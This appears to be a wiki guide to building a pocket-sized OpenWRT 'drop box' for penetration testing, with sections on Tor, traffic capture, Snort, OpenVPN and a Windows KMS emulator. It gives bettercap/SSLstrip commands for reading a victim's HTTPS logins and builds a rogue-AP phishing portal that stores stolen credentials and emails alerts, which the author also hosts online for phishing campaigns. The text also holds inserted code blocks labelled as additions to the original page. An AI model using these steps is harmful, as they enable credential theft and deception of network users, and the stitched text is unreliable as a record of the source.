Lan-Dropbox – Pentesting “drop box”

See GITHUB WIKI for full information and instructions!

I was looking for a wireless access point with some network functions for home, and found this Chinese model at a good price on which OpenWRT and a set of security tools can be installed.

It is set up as a penetration testing “drop box” with multiple functions.

Key Features:
  Integrated Wired and Wireless connections + 4GB storage
  Can establish an SSH tunnel through the target network, or can be accessed by wifi
  Can be configured as a wifi sniffer and logger (Wardriving)
  Network Intrusion Prevention System (NIPS) and Network Intrusion Detection System (NIDS)
  Low power consumption, no need to find a power outlet during the pen test
  Multiple PenTesting Tools included:
  (tcpdump, nbtscan, netcat, nmap, kismet, karma, snort, aircrack-ng, ettercap-ng, 
  reaver, WEP cracker, MDK3, Password & Network Sniffer, Wifi Nuke..) to name a few
  Can be easily carried in a pocket, hidden anywhere..
  
Use Cases:
  War walking / wireless auditing (5V 1.2A battery, micro-USB connector)
  Penetration testing drop box
  Anonymizing middlebox (Tor Proxy)
  Phishing with captive portals (Evil Twin)
  Man In The Middle (MITM) SSL Proxy (Rogue AP)
  OpenVPN client
  Windows Key Management Server (KMS Emulated Server)
  Pivot box (reverse connection via SSH or OpenVPN)
  Personal Portable Security Systems (NIPS - NIDS)
  General network auditing, recon..

  Setup
   1 - Install OpenWRT
   2 - Tor proxy and anonymizing setup

  Tools
   3 - Analyzing with "Remote Wireshark Listener"
   4 - Captive portal
   5 - KMS Server
   6 - SWORD project
   7 - Snort 
   8 - OpenVPN

  https://technet.microsoft.com/en-us/library/ff793434.aspx
  https://wiki.openwrt.org/doc/howto/extroot              
  http://www.rationallyparanoid.com/articles/tcpdump.html 
  https://www.bettercap.org/legacy/ 
  https://forums.mydigitallife.net/threads/emulated-kms-servers-on-non-windows-platforms.50234/
  https://github.com/tomacwrt/tomacwrt.github.io
  https://wiki.openwrt.org/doc/howto/snort
  KMS - cokebar

Installing OpenWRT

Why OpenWRT? A list of things you can do with OpenWrt besides having it work as a router:

SSH server for SSH tunnelling, VPN, BitTorrent client, running server software (web server, IRC server, BitTorrent tracker..), traffic shaping and QoS, a guest network, capturing and analysing network traffic.. etc.

In this case, also:

Tor anonymizing proxy, KMS Authenticating Server, Phishing captive portals, Intrusion detection/prevention systems…

First of all, check whether there is firmware for this device on the official site.

Look for the exact model and download it.

Firmware for this device

Factory default interface:

New OpenWRT interface: 

Set a password; it is also recommended to change the default IP range 192.168.1.1 to 192.168.X.X to avoid address conflicts.

Lan configuration
Ip configuration

Activate the SSH connection on the LAN interface, save and restart.

Ssh connection

Connect by SSH to 192.168.X.X as user root with the password you selected:

root // password_selected

A – Copy the OpenWrt’s root filesystem onto an external USB flash drive:

opkg update
opkg install block-mount
opkg install fdisk

B – Activate USB support and ext4 file system

opkg install kmod-usb-storage
opkg install kmod-fs-ext4
opkg install e2fsprogs
fdisk -l

C – Delete partition and create a new one

fdisk /dev/sda

root@OpenWrt:~# fdisk /dev/sda
Command (m for help): d
Selected partition 1
Partition 1 has been deleted.

Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.

Create the new partition:
root@OpenWrt:~# fdisk /dev/sda

Welcome to fdisk (util-linux 2.25.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.

Command (m for help): n
Partition type
 p primary (0 primary, 0 extended, 4 free)
 e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 
First sector (2048-61489151, default 2048): 
Last sector, +sectors or +size{K,M,G,T,P} (2048-61489151, default 61489151):

Created a new partition 1 of type 'Linux' and of size 29.3 GiB.

Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.

D – Format the drive to ext4.

mkfs.ext4 /dev/sda1

E – Create a mount point and mount the partition you just created.

mkdir /mnt/sda1
mount /dev/sda1 /mnt/sda1

F – Copy the current file system to the USB stick partition.

mkdir -p /tmp/cproot
mount --bind / /tmp/cproot
tar -C /tmp/cproot -cvf - . | tar -C /mnt/sda1 -xf -
umount /tmp/cproot

G – Install nano

opkg install nano

H – Next, configure fstab so the USB drive is mounted at boot and used as the root filesystem

block detect > /etc/config/fstab (creates an initial /etc/config/fstab if it does not exist yet), then edit it:
nano /etc/config/fstab

I – Add the following to the text file.

config 'mount'
 option target /
 option device /dev/sda1
 option fstype ext4
 option options rw,sync
 option enabled 1
 option enabled_fsck 0

J – Reboot and test.

So far we have an AP with OpenWRT and 4GB of space for tools and captures; next, add anonymity with Tor.

Tor Proxy

A – Log in to the router via SSH and back up all related configuration files (change the SSH IP according to your setup).

ssh root@192.168.X.X
cp /etc/config/network  /etc/config/network.bac
cp /etc/config/dhcp     /etc/config/dhcp.bac
cp /etc/config/firewall /etc/config/firewall.bac
cp /etc/config/wireless /etc/config/wireless.bac

B – Edit /etc/config/network and add a new network interface wifi

config interface   'wifi'
    option proto   'static'
    option ipaddr  '192.168.2.1'
    option netmask '255.255.255.0'

C – Edit /etc/config/dhcp and create new DHCP pool for the wifi interface

config dhcp 'wifi'
    option interface    'wifi'
    option start        '100'    
    option limit        '150'    
    option leasetime    '12h' 

D – Edit /etc/config/firewall and create a new firewall zone wifi and setup forwarding rules

config zone
    option name    'wifi'
    option input   'ACCEPT'
    option output  'ACCEPT'
    option forward 'REJECT'
    option network 'wifi'

config forwarding
    option src     'wifi'
    option dest    'wan' 

config forwarding
    option src     'wan'
    option dest    'wifi'

E – Edit /etc/config/wireless to modify the existing Wi-Fi hotspot setup, change the option network to wifi from lan in the wifi-iface section.

config wifi-device    'radio0'
    option type       'mac80211'
    option hwmode     '11g'
    option path       'platform/ar933x_wmac'
    option htmode     'HT20'
    option channel    '1'
    option country    'IN'
    option txpower    '20'

config wifi-iface
    option device     'radio0'
    option ssid       'TorAP'
    option mode       'ap'
    option network    'wifi'
    option disabled   '0'
    option encryption 'psk2'
    option key        '2GardeniasParaTi'

F – Bring up the wifi network interface and restart dnsmasq and network service.

ifup wifi
/etc/init.d/dnsmasq  restart
/etc/init.d/network  restart

OpenWrt tor setup

G – Install Tor

opkg update
opkg install tor

H – I store the Tor related data in the /etc/tor/data folder instead of /var/lib/tor (on OpenWrt /var lives in RAM, so it would not survive a reboot)

mkdir -p /etc/tor/data

I – Backup

cp /etc/tor/torrc /etc/tor/torrc.bac

J – Create a new Tor config file

nano /etc/tor/torrc

K – Configuration:

DataDirectory /etc/tor/data/
Log notice file /etc/tor/data/notices.log

AllowUnverifiedNodes middle,rendezvous
VirtualAddrNetworkIPv4 10.192.0.0/11
AutomapHostsSuffixes .onion,.exit
AutomapHostsOnResolve 1

TransPort 9040
TransListenAddress 192.168.2.1

DNSPort 9053
DNSListenAddress 192.168.2.1

SocksPort 9050
SocksBindAddress 192.168.2.1:9050
SocksBindAddress 192.168.1.1:9050

L – Tor start:

/etc/init.d/tor start

M – Monitor the Tor log data

tail -f /etc/tor/data/notices.log (create the file first if it does not exist)

Edit the Tor init script, /etc/init.d/tor, so that Tor starts successfully at every boot: some delay is needed before starting the main tor process. Add sleep 30 before the procd_open_instance line near the end of the /etc/init.d/tor file.

N – Firewall rules to forward all internet traffic through Tor network

Add iptables rules to forward all traffic from wlan0 interface through Tor network.

O – Edit /etc/firewall.user file:

tor_rules() {
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 22 -j REDIRECT --to-ports 22
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 9050 -j REDIRECT --to-ports 9050
iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j REDIRECT --to-ports 9053
iptables -t nat -A PREROUTING -i wlan0 -p tcp --syn -j REDIRECT --to-ports 9040
}
tor_rules

P – Restart the firewall service for the changes to take effect.

/etc/init.d/firewall restart

These rules do not redirect SSH or SOCKS proxy requests from devices connected through Wi-Fi, because the rules for ports 22 and 9050 come first and match before the --syn catch-all.
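To see where the tor_rules() above actually send a client packet, here is an added rule-order simulator (not part of the original page): it walks a constructed copy of the four nat PREROUTING rules in the order firewall.user appends them (first match wins) and reports the outcome for sample packets. It confirms the SSH and SOCKS exemptions and, as a leak check, shows that UDP other than DNS is never redirected and leaves through the wan forwarding in the clear; the iptables-save-style rule text and the sample packets are constructed for this example.

```shell
#!/bin/sh
# Added example: simulate the nat PREROUTING rules of tor_rules() from firewall.user.
# TOR_NAT_RULES is a constructed copy of those four rules in iptables-save form, in the
# order they are appended (first match wins). Replace it with the PREROUTING lines of
# your own `iptables-save -t nat` output to audit a live router.
TOR_NAT_RULES='-A PREROUTING -i wlan0 -p tcp --dport 22 -j REDIRECT --to-ports 22
-A PREROUTING -i wlan0 -p tcp --dport 9050 -j REDIRECT --to-ports 9050
-A PREROUTING -i wlan0 -p udp --dport 53 -j REDIRECT --to-ports 9053
-A PREROUTING -i wlan0 -p tcp --syn -j REDIRECT --to-ports 9040'

# tor_path IFACE PROTO DPORT SYN
# Prints the local port the first matching rule redirects the packet to, or "direct"
# when no rule matches, i.e. the packet is forwarded towards wan unchanged (a Tor leak).
# SYN is 1 for a TCP connection-opening packet, 0 otherwise; later packets of a
# redirected flow follow the conntrack entry created by the SYN, so only new
# connections need to hit the --syn rule.
tor_path() {
  p_if=$1 p_proto=$2 p_dport=$3 p_syn=$4
  while read -r rule; do
    [ -n "$rule" ] || continue
    r_if='' r_proto='' r_dport='' r_syn=0 r_to=''
    set -- $rule
    while [ $# -gt 0 ]; do
      case $1 in
        -i)         r_if=$2;    shift ;;
        -p)         r_proto=$2; shift ;;
        --dport)    r_dport=$2; shift ;;
        --syn)      r_syn=1 ;;
        --to-ports) r_to=$2;    shift ;;
      esac
      shift
    done
    # every match condition present in the rule must hold for the packet
    [ -z "$r_if" ]    || [ "$r_if" = "$p_if" ]       || continue
    [ -z "$r_proto" ] || [ "$r_proto" = "$p_proto" ] || continue
    [ -z "$r_dport" ] || [ "$r_dport" = "$p_dport" ] || continue
    [ "$r_syn" = 0 ]  || [ "$p_syn" = 1 ]            || continue
    printf '%s\n' "$r_to"
    return 0
  done <<EOF
$TOR_NAT_RULES
EOF
  printf 'direct\n'
}

# tor_leak_report: runs a constructed set of client packets from the Wi-Fi side through
# the rules, prints one line per packet and a final "leaks: N" summary line.
tor_leak_report() {
  leaks=0
  for pkt in \
    'wlan0 tcp 443 1' \
    'wlan0 tcp 22 1' \
    'wlan0 tcp 9050 1' \
    'wlan0 udp 53 0' \
    'wlan0 udp 123 0' \
    'wlan0 udp 443 0'; do
    set -- $pkt
    to=$(tor_path "$@")
    case $to in
      direct) leaks=$((leaks + 1)); tag='LEAK (forwarded to wan unchanged)' ;;
      9040)   tag='Tor TransPort' ;;
      9053)   tag='Tor DNSPort' ;;
      *)      tag="local service on port $to (exempted by rule order)" ;;
    esac
    printf '%-5s %-3s dport %-4s -> %s\n' "$1" "$2" "$3" "$tag"
  done
  printf 'leaks: %s\n' "$leaks"
}

tor_leak_report
```

Everything Tor-bound is REDIRECTed to local ports and handled as INPUT, so the wifi-to-wan forwarding section in /etc/config/firewall is only ever used by the leaking packets; removing that forwarding so the zone's forward REJECT applies closes the leak (my suggestion, not a step from the page).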

Q – Avoiding issues due to low RAM

Adding swap space improves the situation considerably: 8-16 MB of swap is enough, as it never uses more than 2-3 MB. To add swap, either use a dedicated swap partition or simply create a swap file and use it.

dd if=/dev/zero of=/swap_file bs=1M count=32
mkswap /swap_file
echo 95 > /proc/sys/vm/swappiness
swapon /swap_file

R – To make it permanent, add vm.swappiness=95 to the /etc/sysctl.conf file.

echo 'vm.swappiness=95' >>  /etc/sysctl.conf

Add swapon /swap_file to /etc/rc.local before the exit 0 line, and that’s all. Afterwards, check memory usage to confirm the swap is active.

S – Test the OpenWrt Tor transparent proxy and auto forwarding

Connect a device to the new Wi-Fi hotspot; the connected device should receive an IP address in the 192.168.2.0/24 range. To check whether Tor is working, open https://check.torproject.org/ in a browser.

To check your public IP:

wget -cq http://ident.me -O -

In Firefox the proxy configuration is simple: open Edit > Preferences > Advanced > Network > Connection > Settings from the menu bar, choose Manual proxy configuration, set SOCKS host to 192.168.2.1 and Port 9050, select SOCKS v5 and check the Remote DNS option. See the screenshot below.

Analyzing communications

Tcpdump is a command-line tool whose main use is to analyse the traffic passing through the network. It lets the user capture and display in real time the packets sent and received on the network the computer is connected to.

Bettercap is the ‘Swiss Army knife’ for 802.11, BLE and Ethernet networks reconnaissance and attacks.

A – SSH into the router with OpenWrt installed (port 22) and install iptables-mod-tee with the following command:

opkg update
opkg install iptables-mod-tee

B – Run the following iptables command to send a copy of each IP packet leaving the interface (-o br-lan), except those from the excluded source address (! -s), to the capture host given as --gateway:

iptables -A POSTROUTING -t mangle -o br-lan ! -s 192.168.9.121 -j TEE --gateway 192.168.9.183

C – Run the following command to send a copy of each packet entering the interface (-i br-lan), except those addressed to the excluded destination (! -d), to the capture host given as --gateway:

iptables -A PREROUTING -t mangle -i br-lan ! -d 192.168.9.121 -j TEE --gateway 192.168.9.183

D – Capture traffic in Wireshark with the following filter applied:

(ip.src == 192.168.9.121) || (ip.dst == 192.168.9.121)

Capturing communication with tcpdump:

E – SSH on the router and install «tcpdump» with the following command:

opkg update
opkg install tcpdump

F – Execute the following command to listen on the interface (-i), save the captured packets to a file (-w) and print details while doing so (-v).

tcpdump -i any -v -w pcap.cap

Open the pcap.cap file with Wireshark for further analysis.

Obtain HTTPS credentials with Bettercap and SSLstrip

G – Install the dependencies (these steps use apt-get and gem, so they run on a Linux host rather than on the router)

apt-get install build-essential ruby-dev libpcap-dev

H – Clone the repository

git clone https://github.com/evilsocket/bettercap

I – Change into the project folder

cd bettercap

J – Build the gem.

gem build bettercap.gemspec

K – Install the gem

gem install bettercap*.gem

L – Open a terminal and write:

bettercap

We should see all devices connected to our network; in this example the target is IP 192.168.100.251.

bettercap -T [VICTIM IP] --proxy -P POST

In my case it would be as follows: bettercap -T 192.168.100.251 --proxy -P POST

If we want the attack to target the entire network, we simply do not specify the victim's IP and it will capture all the network traffic.

bettercap -T --proxy -P POST

Watch POC on Youtube:

Once the victim accesses any HTTPS page (in this case Facebook), we can see the traffic in the clear and therefore the credentials in plain text.

Captive portal

pollonegro edited this page on 11 May 2018 · 4 revisions

Here the captive portal runs on a ‘rogue access point’, defined as ‘a wireless access point that has been installed on a secure network without explicit authorization from a local network administrator, whether added by a well-meaning employee or by a malicious attacker.’

The intention is to deceive the user and capture their credentials.

Prerequisites: preparing the router.

Install NoDogSplash through SSH:

opkg update
opkg install nodogsplash
uci set nodogsplash.@instance[0].enabled=1
uci commit
/etc/init.d/nodogsplash start
/etc/init.d/nodogsplash enable

Through the web interface go to: Network > Wifi > Add

Wifi interface
Wifi config

Finally Save & Apply and reboot

Edit /etc/nodogsplash/htdocs/splash.html (Main page of captive portal)

Check everything with: ndsctl status

It must return something similar to the following:

==================
NoDogSplash Status
====
Version: 0.9_beta9.9.9
Uptime: 0d 0h 0m 12s
Gateway Name: OpenWrt Nodogsplash
Managed interface: br-lan
Managed IP range: 0.0.0.0/0
Server listening: 192.168.13.1:2050
Splashpage: /etc/nodogsplash/htdocs/splash.html
Traffic control: no
Total download: 4 kByte; avg: 3.12533 kbit/s
Total upload: 8 kByte; avg: 5.822 kbit/s
====
Client authentications since start: 0
Current clients: 0
====
Blocked MAC addresses: none
Allowed MAC addresses: N/A
Trusted MAC addresses: none
========

A – Install PHP

NoDogSplash's own server cannot run PHP, so PHP is used with OpenWRT's default uHTTPd server instead, without installing a separate web server. Installing PHP is easy through SSH with the command

opkg install php5 php5-cgi

If this does not work, make sure the line src/gz barrier_breaker_oldpackages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/oldpackages/ is present in your /etc/opkg.conf file and update the package list.

In /etc/config/uhttpd, add the line list interpreter '.php=/usr/bin/php-cgi' to the main section.

B – Set up the welcome page and capture the credentials

We want to create a presentation page specific to our target environment, in an attempt to trick users into submitting their credentials. We could also try to run malicious JavaScript or serve a malicious file such as an executable, a browser extension or a PDF.

To capture the submitted credentials, I use the following code for the login form (snippets shown as screenshots):

Main portal redirection:

Main portal

Collecting data:

Password capture PHP

Writing to file:

Gmail redirection

On the one hand, this page is served from the NoDogSplash server (/etc/nodogsplash/htdocs/) on port 2050. After a user enters their credentials and submits them, location redirects the user to gmail.com. As an example, I want to store the credentials on the router and send myself an email to be notified once credentials have been captured.

On the other hand, it has also been deployed online to cover the possibility of future phishing campaigns:

Captive portal online

C – To send an alert by email, install msmtp on the router by executing the command:

opkg install msmtp 

D – Once installed, edit the configuration file /etc/msmtprc to include mail host information:

The php.ini file must be edited to include the line sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc".

The following code in capture.php sends an alert by email with some information about the client and redirects them to a fake error page:

$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$referrer = $_SERVER['HTTP_REFERER'];

The final result is an email alert, plus the credentials stored in a local file on the router (or, in my case, hosted on the FTP server):

KMS Server

pollonegro edited this page on 23 May 2018 · 6 revisions

Windows Server: Using the Key Management Service (KMS) for Activation of Volume-Licensed Systems

A – Install (in the OpenWRT shell):

opkg install wget (if not installed)
opkg update

Transfer the files by SCP from a Linux console:
scp luci-app-vlmcsd_1.0.2-1_all.ipk root@192.168.X.X:/tmp/
scp vlmcsd_svn1111-1_ramips_24kec.ipk root@192.168.X.X:/tmp/

Then, by SSH in OpenWRT:
cd /tmp
opkg install vlmcsd_svn1111-1_ramips_24kec.ipk
opkg install luci-app-vlmcsd_1.0.2-1_all.ipk
opkg update

B – Check that automatic activation is configured correctly (in a Windows client shell):

nslookup -type=srv _vlmcs._tcp.lan

C – Set the key management service host (in a Windows client shell):

slmgr -skms 192.168.13.1

D – Activate (in a Windows client shell):

slmgr -ato

SWORD Project

S.W.O.R.D is a web-based UI for OpenWRT that includes common pentest tools: URLSnarf, Ettercap, tcpdump, nmap, etc.

Pros:
User Friendly Interface
Speed
Runs on phone

Cons:
Limited Tools
Can’t launch Wi-Fi attacks (while USB is used as storage)

Instructions:

Extract the files into the /www directory.

Make sure you have bash installed, otherwise the scripts won't work
(opkg update; opkg install bash --force-depends)

Give 655 to the /cgi-bin directory (chmod -R 655 /www/cgi-bin/*).

Navigate to “192.168.13.1/SWORD”.

System Information: 

Web Interface and utils: 

Snort IDS IPS

Snort is a free and open-source network intrusion prevention system (NIPS) and network intrusion detection system (NIDS).

OpenWRT Snort Official Instructions

Install:

opkg update 
opkg install snort

#Choose interface and config file
vi /etc/config/snort 

#Setup snort config file
vi /etc/snort/snort.conf 

#Run snort at startup
/etc/init.d/snort enable 

#Start snort now
/etc/init.d/snort start 

As of 03/03/2016 this only installs Snort and runs it without the installed config. To start it with the config you must edit the /etc/init.d/snort file and replace the line

procd_set_param command $PROG "-q" "--daq-dir" "/usr/lib/daq/" "-i" "$interface" "-s" "-N"

with

procd_set_param command $PROG "-c" "$config_file" "-q" "--daq-dir" "/usr/lib/daq/" "-i" "$interface" "-s" "-N"
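The init-script edit above is easy to apply twice by hand or to lose when the package is reinstalled, so here is an added helper (not part of the page or of the OpenWrt snort package) that performs the replacement idempotently and refuses to touch a script that does not contain the expected command line. The two lines are copied from the page; the init-script fragment the test builds is constructed.

```shell
#!/bin/sh
# Added example: apply the /etc/init.d/snort fix from the page (pass "-c" "$config_file"
# to snort so it starts with the installed config) without duplicating it on a rerun.
ORIG_LINE='procd_set_param command $PROG "-q" "--daq-dir" "/usr/lib/daq/" "-i" "$interface" "-s" "-N"'
FIXED_LINE='procd_set_param command $PROG "-c" "$config_file" "-q" "--daq-dir" "/usr/lib/daq/" "-i" "$interface" "-s" "-N"'

# snort_init_state FILE -> prints "fixed", "unfixed" or "unknown" (expected line absent).
# grep -F compares literally, so the $ and " in the lines need no escaping.
snort_init_state() {
  if grep -qF "$FIXED_LINE" "$1"; then echo fixed
  elif grep -qF "$ORIG_LINE" "$1"; then echo unfixed
  else echo unknown
  fi
}

# patch_snort_init FILE -> rewrites FILE in place; returns 0 when FILE ends up fixed and
# 1 when the expected command line is absent (e.g. a newer package ships a different
# init script), in which case FILE is left untouched so nothing is broken blindly.
patch_snort_init() {
  f=$1
  case $(snort_init_state "$f") in
    fixed)   return 0 ;;
    unknown) return 1 ;;
  esac
  # Literal substring replacement with awk (index/substr), again to avoid treating the
  # $PROG and $config_file text as regular expressions; keep the original indentation.
  awk -v orig="$ORIG_LINE" -v fixed="$FIXED_LINE" '
    { i = index($0, orig)
      if (i > 0) $0 = substr($0, 1, i - 1) fixed substr($0, i + length(orig)) }
    { print }' "$f" > "$f.tmp" && mv "$f.tmp" "$f"
}

# Usage on the router: patch_snort_init /etc/init.d/snort && /etc/init.d/snort restart
```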

Configuration:

snort -c "snort.conf" -i "lo" --daq-dir /usr/lib/daq

Start:

/etc/init.d/snort start

snort -i vlan1 &

root@OpenWrt:~# Running in IDS mode with inferred config file: /etc/snort/snort.conf

Initializing Network Interface vlan1

        --== Initializing Snort ==--
Initializing Output Plugins!
Decoding Ethernet on interface vlan1
Initializing Preprocessors!
Initializing Plug-ins!
Parsing Rules file /etc/snort/snort.conf

+++++++++++++++++++++++++++++++++++++++++++++++++++
Initializing rule chains...
,-----------[Flow Config]----------------------
| Stats Interval:  0
| Hash Method:     2
| Memcap:          10485760
| Rows  :          4099
| Overhead Bytes:  16400(%0.16)
`----------------------------------------------
No arguments to frag2 directive, setting defaults to:
    Fragment timeout: 60 seconds
    Fragment memory cap: 4194304 bytes
    Fragment min_ttl:   0
    Fragment ttl_limit: 5
    Fragment Problems: 0
    Self preservation threshold: 500
    Self preservation period: 90
    Suspend threshold: 1000
    Suspend period: 30
Stream4 config:
    Stateful inspection: ACTIVE
    Session statistics: INACTIVE
    Session timeout: 30 seconds
    Session memory cap: 8388608 bytes
    State alerts: INACTIVE
    Evasion alerts: INACTIVE
    Scan alerts: INACTIVE
    Log Flushed Streams: INACTIVE
    MinTTL: 1
    TTL Limit: 5
    Async Link: 0
    State Protection: 0
    Self preservation threshold: 50
    Self preservation period: 90
    Suspend threshold: 200
    Suspend period: 30
    Enforce TCP State: INACTIVE
    Midstream Drop Alerts: INACTIVE

Stream4_reassemble config:
    Server reassembly: INACTIVE
    Client reassembly: ACTIVE
    Reassembler alerts: ACTIVE
    Zero out flushed packets: INACTIVE
    flush_data_diff_size: 500
    Ports: 21 23 25 53 80 110 111 143 513 1433
    Emergency Ports: 21 23 25 53 80 110 111 143 513 1433
X-Link2State Config:
    Ports: 25 691
112 Snort rules read...
112 Option Chains linked into 57 Chain Headers
0 Dynamic rules
+++++++++++++++++++++++++++++++++++++++++++++++++++

Warning: flowbits key 'tls1.client_hello.request' is checked but not ever set.
Warning: flowbits key 'sslv3.client_hello.request' is checked but not ever set.

+-----------------------[thresholding-config]----------------------------------
| memory-cap : 1048576 bytes
+-----------------------[thresholding-global]----------------------------------
| none
+-----------------------[thresholding-local]-----------------------------------
| none
+-----------------------[suppression]------------------------------------------
| none
+------------------------------------------------------------------------------
Rule application order: ->activation->dynamic->alert->pass->log
Log directory = /var/log/snort

        --== Initialization Complete ==--

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.3.3 (Build 14)
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 1998-2004 Sourcefire Inc., et al.
To make sure Snort was logging to the remote machine, I checked the syslog 
there and found these two new entries in /var/log/syslog:

Mar  2 15:40:44 192.168.13.1 kernel: vlan1: dev_set_promiscuity(master, 1)
Mar  2 15:40:44 192.168.13.1 kernel: device vlan1 entered promiscuous mode

OpenVPN

The OpenVPN server running on your router can provide a secure connection back to your home network while you’re away. If you need to access the router itself or any of your home network devices from afar, the OpenVPN server is a great and secure solution. This article provides a concise and correct procedure for setting up an OpenVPN server on your router.

1 – Install OpenVPN and other required packages to your router.

2 – Generate certificates necessary for both OpenVPN Server running on your router and the OpenVPN Client running on the (remote) client device you will be connecting from.

3 – Edit configuration files on your router to enable OpenVPN Server.

4 – Generate an .ovpn file for client devices.

5 – Copy an .ovpn file from your router to your clients.

Make a backup first.

Install OpenVPN and Other Packages

SSH into your router and run:

opkg update && opkg install openvpn-openssl openssl-util luci-app-openvpn

Edit Configuration Files

create-certs.sh


#!/bin/sh
 
printf "\n\n  # Creating Directory Structure #\n\n"
printf %b "------------------------------------------------------------\n"
 
  PKI_DIR="/etc/openvpn/ssl"
 
    [ -d ${PKI_DIR} ] && rm -rf ${PKI_DIR}
      mkdir -p ${PKI_DIR} && chmod -R 0600 ${PKI_DIR}
      cd ${PKI_DIR}
 
    touch index.txt && touch index && echo 1000 > serial
    cp /etc/ssl/openssl.cnf ${PKI_DIR}
 
printf "\n\n  # Customizing openssl.cnf #\n\n"
printf %b "------------------------------------------------------------\n\n"
 
  PKI_CNF=${PKI_DIR}/openssl.cnf
 
    sed -i '/^dir/   s:=.*:= /etc/openvpn/ssl:'                ${PKI_CNF}
    sed -i '/^new_certs_dir/   s:=.*:= /etc/openvpn/ssl:'      ${PKI_CNF}
    sed -i '/.*Name/ s:= match:= optional:'                    ${PKI_CNF}
    sed -i '/organizationName_default/    s:= .*:= WWW Ltd.:'  ${PKI_CNF}
    sed -i '/stateOrProvinceName_default/ s:= .*:= London:'    ${PKI_CNF}
    sed -i '/countryName_default/         s:= .*:= GB:'        ${PKI_CNF}
    sed -i '/default_days/   s:=.*:= 3650:'                    ${PKI_CNF}
    sed -i '/default_bits/   s:=.*:= 4096:'                    ${PKI_CNF}
 
    cat >> ${PKI_CNF} <<"EOF"
[ my-server ] 
  keyUsage = digitalSignature, keyEncipherment
  extendedKeyUsage = serverAuth
 
[ my-client ] 
  keyUsage = digitalSignature
  extendedKeyUsage = clientAuth
EOF
 
printf "\n\n  # Generating Server PSK and CA, Server, & Client Certs #\n\n"
printf %b "------------------------------------------------------------\n"
 
  printf "\n\n  ...Generating Certificate Authority Cert & Key...\n"
  printf %b "------------------------------------------------------------\n\n"
    openssl req -batch -nodes -new -keyout "ca.key" -out "ca.crt" -x509 -config ${PKI_CNF} -days 3650
 
  printf "\n\n  ...Generating Server Cert & Key...\n"
  printf %b "------------------------------------------------------------\n\n"
    openssl req -batch -nodes -new -keyout "my-server.key" -out "my-server.csr" -subj "/CN=my-server" -config ${PKI_CNF}
 
  printf "\n\n  ...Signing Server Cert...\n\n"
    openssl ca  -batch -keyfile "ca.key" -cert "ca.crt" -in "my-server.csr" -out "my-server.crt" -config ${PKI_CNF} -extensions my-server
 
  printf "\n\n  ...Generating Client Cert & Key...\n"
  printf %b "------------------------------------------------------------\n\n"
    openssl req -batch -nodes -new -keyout "my-client.key" -out "my-client.csr" -subj "/CN=my-client" -config ${PKI_CNF}
 
  printf "\n\n  ...Signing Client Cert...\n"
  printf %b "------------------------------------------------------------\n\n"
    openssl ca  -batch -keyfile "ca.key" -cert "ca.crt" -in "my-client.csr" -out "my-client.crt" -config ${PKI_CNF} -extensions my-client     
 
  printf "\n\n  ...Generating OpenVPN TLS PSK...\n"
  printf %b "------------------------------------------------------------\n\n"
    openvpn --genkey --secret tls-auth.key
 
  printf "\n  ...Generating Diffie-Hellman Cert...\n"
  printf %b "------------------------------------------------------------\n\n"
    printf "    # May take a while to complete (~25m on WRT3200ACM) #\n\n\n"
    openssl dhparam -out dh2048.pem 2048
 
printf "\n\n  ...Correcting Permissions...\n"
printf %b "------------------------------------------------------------\n"
  chmod 0600 ca.key dh2048.pem my-server.key my-client.key tls-auth.key
 
printf "\n\n  # Copying Certs & Keys to /etc/openvpn/ #\n"
printf %b "------------------------------------------------------------\n"
  cp ca.crt my-server.* my-client.* dh2048.pem tls-auth.key /etc/openvpn
 
printf "\n\n  . . .  DONE  . . .  \n\n\n"

create-configs.sh


#!/bin/sh
 
# Modify /etc/config/network
  uci set network.vpnserver='interface'
  uci set network.vpnserver.proto='none'
  uci set network.vpnserver.ifname='ovpns0'
  uci set network.vpnserver.auto='1'
uci commit network
 
# Modify /etc/config/firewall
  uci add firewall rule
  uci set firewall.@rule[-1].name='Allow-OpenVPN-Inbound'
  uci set firewall.@rule[-1].target='ACCEPT'
  uci set firewall.@rule[-1].src='*'
  uci set firewall.@rule[-1].proto='tcpudp'
  uci set firewall.@rule[-1].dest_port='1194'
 
  uci add firewall zone
  uci set firewall.@zone[-1].name='vpnserver'
  uci set firewall.@zone[-1].input='ACCEPT'
  uci set firewall.@zone[-1].forward='REJECT'
  uci set firewall.@zone[-1].output='ACCEPT'
  uci set firewall.@zone[-1].masq='1'
  uci set firewall.@zone[-1].network='vpnserver'
 
  uci add firewall forwarding
  uci set firewall.@forwarding[-1].src='vpnserver'
  uci set firewall.@forwarding[-1].dest='wan'
 
  uci add firewall forwarding
  uci set firewall.@forwarding[-1].src='vpnserver'
  uci set firewall.@forwarding[-1].dest='lan'
uci commit firewall
 
# Modify /etc/config/openvpn
  uci set openvpn.vpnserver='openvpn'
  uci set openvpn.vpnserver.enabled='1'
  uci set openvpn.vpnserver.dev_type='tun'
  uci set openvpn.vpnserver.dev='ovpns0'
  uci set openvpn.vpnserver.port='1194'
  uci set openvpn.vpnserver.proto='udp'
  uci set openvpn.vpnserver.comp_lzo='yes'
  uci set openvpn.vpnserver.keepalive='10 120'
  uci set openvpn.vpnserver.persist_key='1'
  uci set openvpn.vpnserver.persist_tun='1'
  uci set openvpn.vpnserver.ca='/etc/openvpn/ca.crt'
  uci set openvpn.vpnserver.cert='/etc/openvpn/my-server.crt'
  uci set openvpn.vpnserver.key='/etc/openvpn/my-server.key'
  uci set openvpn.vpnserver.dh='/etc/openvpn/dh2048.pem'
  uci set openvpn.vpnserver.tls_auth='/etc/openvpn/tls-auth.key 0'
  uci set openvpn.vpnserver.mode='server'
  uci set openvpn.vpnserver.tls_server='1'
  uci set openvpn.vpnserver.server='192.168.200.0 255.255.255.0'
  uci set openvpn.vpnserver.topology='subnet'
  uci set openvpn.vpnserver.route_gateway='dhcp'
